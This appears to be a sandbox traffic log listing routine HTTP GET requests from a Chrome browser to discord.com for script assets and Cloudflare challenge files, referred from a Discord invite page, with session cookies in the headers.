Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/09563300dbb31ab193bc.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/d8d8bb7602e34b57bbef.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/3c723e3c991fcd7cce58.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/98106.5d0f74b94113ede84656.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
Source: global trafficHTTP traffic detected: GET /api/v9/experiments?with_guild_experiments=true HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/scripts/jsd/56d3063b/main.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/68291.687557b9b660607399a3.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=MuKRNnb87L1y398_4RmJyNjCxq2KEUPnsExQwAzBUyg-1702226721658-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/40413.ee00763112ee8df65f08.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=MuKRNnb87L1y398_4RmJyNjCxq2KEUPnsExQwAzBUyg-1702226721658-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/78995.107fd966757822e36874.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=AvNavXW7DDCNgmSvKuaF7ETFbJLYZ1_4UsbUhLNw5Xo-1702226721674-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/44504.4d34e216cd6b9c5f65cb.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=AvNavXW7DDCNgmSvKuaF7ETFbJLYZ1_4UsbUhLNw5Xo-1702226721674-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/361309226d7befece320.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=PybZ6TXQOksgAKqT6FcwsWY2ZMyheg42CN9l9p7Dw5M-1702226722042-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/ec9008c958a13623f3e0.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=PybZ6TXQOksgAKqT6FcwsWY2ZMyheg42CN9l9p7Dw5M-1702226722042-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/ccc86f642a740efceacb.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dUADPbAb8vBkHij6WYnb9DCSlaRQYa31enz.ClHakeY-1702226722245-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/6377de1b7ec4e85ff431.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dUADPbAb8vBkHij6WYnb9DCSlaRQYa31enz.ClHakeY-1702226722245-0-604800000
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/jsd/r/8336f4d76ab16db3 HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dUADPbAb8vBkHij6WYnb9DCSlaRQYa31enz.ClHakeY-1702226722245-0-604800000; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722
Source: global trafficHTTP traffic detected: GET /assets/25b01771fdb72758a986.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=8GqV951yIbJnKXdxA.2u3o_T_homfrvuU2pSwqr9Bpw-1702226722784-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/0e38d72b52460ff6e911.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=14YgASfcunYfCYrMtSiazsNYDQzmt2zkt8UqgmEMm7Y-1702226722829-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/e9e649f003bbece806b1.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=bTmtl68fxZcRIe4Vn8VK6GTbjrx0M3XVXOSTrtRZKmM-1702226722833-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/96634.924b7b3f0dc4ee21386b.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=bTmtl68fxZcRIe4Vn8VK6GTbjrx0M3XVXOSTrtRZKmM-1702226722833-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/23992.3dc89a4c11d1402ff9e7.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=zIygtpvXesZXGwfXtJTAhcedx5nLjPwWRmcIZhgNXcw-1702226723078-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/68560.e27fd85667a295676749.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=zIygtpvXesZXGwfXtJTAhcedx5nLjPwWRmcIZhgNXcw-1702226723078-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/76546.c03cce63ade2b24646c3.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=7gQkpm8Wrg7CGgLYMJA0VTWrMBLEHt4_9y7yWstYA8M-1702226723349-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/99618.2a643a274b3a91f762ae.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=7gQkpm8Wrg7CGgLYMJA0VTWrMBLEHt4_9y7yWstYA8M-1702226723349-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/15671.93a88de2d317d307d268.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=7gQkpm8Wrg7CGgLYMJA0VTWrMBLEHt4_9y7yWstYA8M-1702226723349-0-604800000
Source: global trafficHTTP traffic detected: GET /assets/e4c0cffdca343bc93615.js HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://discord.com/invite/boringsecurityAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=7gQkpm8Wrg7CGgLYMJA0VTWrMBLEHt4_9y7yWstYA8M-1702226723349-0-604800000
